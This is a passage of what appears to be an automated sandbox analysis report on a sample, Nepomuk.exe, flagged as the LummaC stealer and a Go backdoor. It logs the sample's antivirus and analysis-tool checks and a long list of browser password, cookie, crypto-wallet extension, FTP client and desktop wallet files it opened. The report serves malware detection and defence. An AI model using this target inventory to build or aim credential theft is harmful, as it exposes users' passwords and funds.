utexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: Nepomuk.exe, Nepomuk.exe, 00000000.00000003.1466158005.0000000003F53000.00000004.00000800.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466158005.0000000003FEE000.00000004.00000800.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000000.1219887944.0000000000EF4000.00000002.00000001.01000000.00000003.sdmp, Nepomuk.exe, 00000000.00000003.1271551018.00000000035C6000.00000004.00000800.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472548905.000000000171E000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466457237.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466378385.0000000003FEF000.00000004.00000800.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466407094.0000000001718000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466407094.000000000170C000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1471691846.0000000000EF4000.00000002.00000001.01000000.00000003.sdmp, Nepomuk.exe, 00000000.00000003.1466538836.000000000171C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procmon.exe
                    Source: Nepomuk.exe, 00000000.00000003.1350478251.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1350187617.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471485052.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472145956.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1350308080.0000000001678000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471096945.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472383126.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466589569.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1391895534.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466512578.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1359304340.00000000016E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\Nepomuk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected GO Backdoor
                    Source: Yara matchFile source: 0000000D.00000002.2472257494.000000000447C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2472321608.00000000049AC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2472257494.0000000004508000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: T68WJ1SM1U30WFLN7XXTLWOX8.exe PID: 5852, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: T68WJ1SM1U30WFLN7XXTLWOX8.exe PID: 4508, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: T68WJ1SM1U30WFLN7XXTLWOX8.exe PID: 1732, type: MEMORYSTR
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: 00000000.00000003.1356159060.0000000003F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1359025401.0000000003F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1466158005.0000000003F8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Nepomuk.exe PID: 7724, type: MEMORYSTR
                    Source: Yara matchFile source: 0.2.Nepomuk.exe.1550000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Nepomuk.exe.3550000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Nepomuk.exe.1550000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1471964767.0000000001550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdliaogehgdbhbnmkklieghmmjkpigpaJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
